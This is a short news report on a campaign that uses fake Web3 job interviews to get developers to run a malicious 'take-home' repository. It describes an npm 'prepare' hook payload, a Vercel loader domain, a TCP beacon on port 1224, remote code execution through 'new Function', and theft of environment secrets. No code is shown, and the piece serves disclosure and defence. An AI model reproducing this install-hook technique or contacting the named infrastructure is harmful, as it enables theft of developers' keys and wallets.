A sophisticated supply chain attack targeting developers via fake Web3 job interviews has been uncovered, according to a technical analysis by security researcher reymom.xyz.
The attack begins with social engineering, where recruiters on platforms like LinkedIn or Telegram contact developers with plausible employment offers. After an initial interview, candidates are asked to clone and run a 'take-home' repository, often during a live screen-sharing session.
According to the report, the malicious repository, which impersonated the legitimate 0G Labs project under the name 'MGVerse,' utilized an npm 'prepare' hook to execute a hidden payload. When the developer ran 'npm install,' the process silently spawned a background Node process designed to exfiltrate sensitive data.
"The social pressure of a live interview is the critical vector. You don't have time to audit the repo. You're sharing your screen. You want to impress so you run npm install," the source stated.
Technical execution and data theft
The attack chain involves three distinct stages. The first stage uses a Vercel-hosted loader (ipcheck-six.vercel.app) to initiate the process. The second stage establishes a custom TCP beacon on port 1224, connected to an attacker-controlled server located in Texas.
Once the connection is established, the malware uses a remote code execution (RCE) primitive via a 'new Function' command to run arbitrary code. The primary goal of the exfiltration is to steal the victim's 'process.env' data, which can include API keys, SSH keys, browser cookies, and cryptocurrency wallet seeds.
The researcher, who was personally targeted by the campaign, detected the background process approximately 44 minutes after running the malicious command. The analysis confirmed that the attack was designed to bypass traditional detection by appearing as a standard part of the software installation lifecycle.
Researchers have identified the campaign tag as 'tid=Y3Jhc2ggdGhlIGJhZCBndXlz' and noted that the infrastructure remains active. The repository used in the attack has been archived for further forensic investigation.
